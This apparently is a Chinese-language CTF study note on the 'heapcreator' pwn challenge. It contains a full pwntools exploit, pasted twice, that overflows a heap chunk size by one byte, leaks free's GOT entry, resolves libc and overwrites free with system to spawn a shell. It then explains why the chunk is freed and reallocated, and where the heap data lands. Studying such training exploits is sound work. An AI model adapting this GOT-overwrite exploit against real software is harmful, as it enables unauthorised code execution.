hitcontraining_heapcreator 一点小疑惑
exp:
from pwn import * from LibcSearcher import LibcSearcher #sh=remote("node3.buuoj.cn",25984) sh = process("./heapcreator") elf=ELF('./heapcreator') def create(length,value): sh.recvuntil("Your choice :") sh.sendline("1") sh.recvuntil("Size of Heap : ") sh.sendline(str(int(length))) sh.recvuntil("Content of heap:") sh.sendline(value) def edit(index,value): sh.recvuntil("Your choice :") sh.sendline("2") sh.recvuntil("Index :") sh.sendline(str(int(index))) sh.recvuntil("Content of heap : ") sh.sendline(value) def show(index): sh.recvuntil("Your choice :") sh.sendline("3") sh.recvuntil("Index :") sh.sendline(str(int(index))) def delete(index): sh.recvuntil('Your choice :') sh.sendline('4') sh.recvuntil('Index :') sh.sendline(str(int(index))) create(0x18,'aaaa') create(0x10,'bbbb') create(0x10,'cccc') create(0x10,'/bin/sh') edit(0,'a'*0x18+'\x81') delete(1) size = b'\x08'.ljust(8,b'\x00') payload = b'd'*0x40+ size + p64(elf.got['free']) create(0x70,payload) gdb.attach(sh) show(2) sh.recvuntil('Content : ') free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00')) libc=LibcSearcher("free",free_addr) system_addr=free_addr+libc.dump("system")-libc.dump("free") edit(2,p64(system_addr)) delete(3) sh.interactive()
from pwn import * from LibcSearcher import LibcSearcher #sh=remote("node3.buuoj.cn",25984) sh = process("./heapcreator") elf=ELF('./heapcreator') def create(length,value): sh.recvuntil("Your choice :") sh.sendline("1") sh.recvuntil("Size of Heap : ") sh.sendline(str(int(length))) sh.recvuntil("Content of heap:") sh.sendline(value) def edit(index,value): sh.recvuntil("Your choice :") sh.sendline("2") sh.recvuntil("Index :") sh.sendline(str(int(index))) sh.recvuntil("Content of heap : ") sh.sendline(value) def show(index): sh.recvuntil("Your choice :") sh.sendline("3") sh.recvuntil("Index :") sh.sendline(str(int(index))) def delete(index): sh.recvuntil('Your choice :') sh.sendline('4') sh.recvuntil('Index :') sh.sendline(str(int(index))) create(0x18,'aaaa') create(0x10,'bbbb') create(0x10,'cccc') create(0x10,'/bin/sh') edit(0,'a'*0x18+'\x81') delete(1) size = b'\x08'.ljust(8,b'\x00') payload = b'd'*0x40+ size + p64(elf.got['free']) create(0x70,payload) gdb.attach(sh) show(2) sh.recvuntil('Content : ') free_addr = u64(sh.recvuntil('Done')[:-5].ljust(8,b'\x00')) libc=LibcSearcher("free",free_addr) system_addr=free_addr+libc.dump("system")-libc.dump("free") edit(2,p64(system_addr)) delete(3) sh.interactive()
1.为什么要将chunk1释放后再进行malloc,然后填入数据。而不是直接填入数据?
假如直接填入数据的话,改变一下exp
然后查看堆发现
chunk1的size没有变,所以最多还是只能输入0x10大小的数据,所以我们要先free掉,然后再malloc(0x70),让chunk的size变成0x70,然后填充数据
2.如图
为什么填入的数据会从0x1616050开始?
因为每次add都会创立两个chunk,第一个chunk就是0x1616070处,在后面将会被覆盖,所以我会有这个疑问。第二个chunk,也就是填入数据的chunk,就在0x1616040,0x1616048是size,0x1616050是数据存储的地方。